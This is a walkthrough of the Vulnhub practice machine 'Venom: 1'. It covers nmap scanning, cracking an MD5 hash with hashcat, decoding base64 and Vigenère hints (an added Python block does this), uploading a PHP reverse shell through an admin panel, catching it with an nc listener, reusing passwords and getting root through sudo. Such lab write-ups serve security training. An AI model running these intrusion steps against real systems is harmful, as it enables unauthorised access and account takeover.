VENOM: 1 Vulnhub Walkthrough

Subodh Sharma
4 min read, Jul 31, 2021

Today we are going to take on an OSCP-like challenge machine, Venom, from Vulnhub. This machine requires a lot of enumeration to get a foothold. The authors of this machine are Ayush Bawariya & Avnish Kumar and it belongs to the Venom series. You can download this machine from Vulnhub.

Link :- https://download.vulnhub.com/venom/venom.zip

Security Level: Beginner to intermediate

Let’s start with this machine.

Scanning

Let’s start off by scanning the network and identifying the host IP address with netdiscover.

# netdiscover -i vboxnet0

Netdiscover output

We can see our host IP is 192.168.56.13.

Scan open ports with nmap

# nmap -v -T4 -A -p- 192.168.56.13

We found that ports 21, 80 and 443 are open, while ports 22, 7070 and 8084 are closed.

Enumeration:

Here we have some open ports. First, I decided to take a look at port 80. Although it shows the default Apache page, I found an MD5 hash in a comment on the last line of the page source.

Next, I saved the hash to a file named md5.txt and cracked it with hashcat.

# hashcat -m 0 -a 0 md5.txt /usr/share/wordlists/rockyou.txt

hashcat output

I had no idea where this password belonged, so I moved on to FTP and tried it as both the username and the password on the FTP server. Luckily, I got access.

# ftp 192.168.56.13

Connected to 192.168.56.13.
220 (vsFTPd 3.0.3)
Name (192.168.56.13:root): hostinger
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls

ftp> cd files

ftp> get hint.txt

On the FTP server I found a hint file, which I downloaded right away before exiting the FTP session.

# cat hint.txt

Hey there…

T0D0 —

  • You need to follow the ‘hostinger’ on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
    * some knowledge of cipher is required to decode the dora password..
    * try on venom.box
    password — L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password

Have fun .. :)

Here are some base64 encoded messages that I had to decode one by one, plus one more hint to try venom.box. So I added venom.box to the hosts file.

# vim /etc/hosts

192.168.56.13 venom.box

Next, decode the base64 encoded messages.

Here we found something interesting, and a link.

Following hint.txt, I opened the link https://cryptii.com/pipes/vigenere-cipher in the browser, and we got dora’s credential: E7r9t8@Q#h%Hy+M1234
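The decoding chain from hint.txt, as an added Python example that is not part of the original post: it peels the nested base64 layers of both hint strings and then decrypts the Vigenère password. The key "hostinger" is my assumption, taken from the hint’s "follow the ‘hostinger’" line; with it the output matches the dora password shown above.

```python
import base64
import binascii

# Strings quoted from hint.txt in the walkthrough above.
HINT_CHAIN = "WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0="
HINT_LINK = "aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI="
CIPHERTEXT = "L7f9l8@J#p%Ue+Q1234"
KEY = "hostinger"  # assumption: the word the hint tells you to "follow"


def peel_base64(blob: str, max_layers: int = 10) -> tuple[str, int]:
    """Strip nested base64 layers until the result is no longer valid base64.

    Returns the innermost printable text and the number of layers removed.
    """
    current = blob.strip()
    layers = 0
    for _ in range(max_layers):
        try:
            raw = base64.b64decode(current, validate=True)
            text = raw.decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break  # not base64 (or not ASCII text): we reached the payload
        if not text.isprintable():
            break
        current, layers = text, layers + 1
    return current, layers


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """Classic Vigenère decryption: each letter is shifted back by the matching
    key letter; digits and symbols pass through unchanged and do not consume a
    key letter (the default behaviour of the cryptii pipe the hint points to)."""
    key_shifts = [ord(k.lower()) - ord("a") for k in key if k.isalpha()]
    out, i = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = key_shifts[i % len(key_shifts)]
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    print(peel_base64(HINT_CHAIN))           # ('standard vigenere cipher', 3)
    print(peel_base64(HINT_LINK))            # ('https://cryptii.com/pipes/vigenere-cipher', 1)
    print(vigenere_decrypt(CIPHERTEXT, KEY))  # E7r9t8@Q#h%Hy+M1234
```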

Next, as hint.txt suggests, we open venom.box in the browser.

Next, let’s find some directories with nikto.

# nikto -h http://venom.box/

The nikto result lists many directories, and I tried them one by one in the browser. In the /panel directory we found a login page.

Username :- dora

Password :- E7r9t8@Q#h%Hy+M1234

Let’s log in.

We have logged in successfully as administrator. Next, let’s try to get a reverse shell.

Content > Uploads > Click on upload file > select files > upload your reverse shell

I uploaded a .phar file.

Next, start a listener on the attacker PC and then call the uploaded file.

# nc -nlvp 443

& call > http://venom.box/uploads/php-reverse-shell.phar

Finally got a reverse shell.

Convert to a TTY shell

$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

$ cat /etc/passwd

nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
hostinger:x:1002:1002:,,,:/home/hostinger:/bin/bash

We already know the hostinger password is hostinger. Let’s try it…

Now we are logged in as the hostinger user…

In /var/www/html/backup I found a .htaccess file.

$ cd /var/www/html

$ cd backup

$ ls -lah

$ cat .htaccess

allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

It may be another user’s password, so I tried it for the nathan user, and we got in.

$ su nathan

Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

Root Shell

$ sudo -l

User nathan may run the following commands on venom:
(root) ALL, !/bin/su

$ sudo -i

That’s it! Thanks for reading. Happy Hacking :)
